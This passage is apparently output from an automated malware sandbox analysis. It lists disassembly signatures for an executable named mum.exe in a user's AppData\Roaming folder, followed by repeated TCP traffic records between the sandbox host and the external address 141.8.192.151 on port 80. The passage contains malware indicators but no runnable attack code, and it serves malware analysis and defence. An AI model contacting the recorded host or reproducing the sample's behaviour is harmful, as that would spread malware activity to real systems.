          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E1451h26_2_002E11A8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E6231h26_2_002E5F88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E6689h26_2_002E63E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002E7C69h26_2_002E79C0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]26_2_002E3489
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]26_2_002E3498
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]26_2_002E37AE
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025E6F9h34_2_0025E440
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025EB51h34_2_0025E89A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025EFA9h34_2_0025ECF0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 00253897h34_2_00253561
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025C439h34_2_0025C17F
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025F401h34_2_0025F148
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025F859h34_2_0025F5A2
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025FCB1h34_2_0025F9FA
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025C891h34_2_0025C5DA
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002528E1h34_2_00252620
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025CCE9h34_2_0025CA30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 00253CF7h34_2_00253A38
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025D141h34_2_0025CE88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 00252EA2h34_2_00252A90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 00254157h34_2_00253E98
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025D599h34_2_0025D2E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 002545B7h34_2_002542F9
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025D9F1h34_2_0025D738
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 00254A17h34_2_00254758
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025DE49h34_2_0025DB90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 0025E2A1h34_2_0025DFE8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h34_2_0025217A
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 00252EA2h34_2_00252DD1
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h34_2_00251B48
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then mov dword ptr [ebp-14h], 00000000h34_2_00252359
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F1D01h34_2_005F1A58
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F5501h34_2_005F5258
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F0FF9h34_2_005F0D50
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F02F1h34_2_005F0048
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F9221h34_2_005F8F78
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F8519h34_2_005F8270
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F7811h34_2_005F7568
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F80C1h34_2_005F7E18
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F73BAh34_2_005F7110
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F18A9h34_2_005F1600
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F6AE1h34_2_005F6838
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F5DD9h34_2_005F5B30
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F8DC9h34_2_005F8B20
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F5981h34_2_005F56D8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F8971h34_2_005F86C8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F7C69h34_2_005F79C0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F0BA1h34_2_005F08F8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F6689h34_2_005F63E0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F6F39h34_2_005F6C90
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F6231h34_2_005F5F88
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F1451h34_2_005F11A8
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then jmp 005F0749h34_2_005F04A0
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]34_2_005F3498
          Source: C:\Users\user\AppData\Roaming\mum.exeCode function: 4x nop then lea esp, dword ptr [ebp-04h]34_2_005F3489
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
          Source: global trafficTCP traffic: 192.168.2.22:49171 -> 141.8.192.151:80
          Source: global trafficTCP traffic: 141.8.192.151:80 -> 192.168.2.22:49171
